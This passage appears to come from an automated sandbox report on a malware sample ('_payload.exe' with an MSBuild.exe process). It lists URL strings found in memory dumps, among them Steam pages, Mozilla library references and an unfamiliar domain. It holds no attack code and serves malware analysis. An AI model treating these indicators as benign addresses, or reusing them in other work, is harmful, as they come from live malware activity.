00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, CGDHIE.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, CGDHIE.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864612116.0000000003332000.00000004.00000020.00020000.00000000.sdmp, AAKEGI.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864612116.0000000003332000.00000004.00000020.00020000.00000000.sdmp, AAKEGI.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864612116.0000000003332000.00000004.00000020.00020000.00000000.sdmp, AAKEGI.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: CGDHIE.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1994902601.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896695804.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001308000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199747278259[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 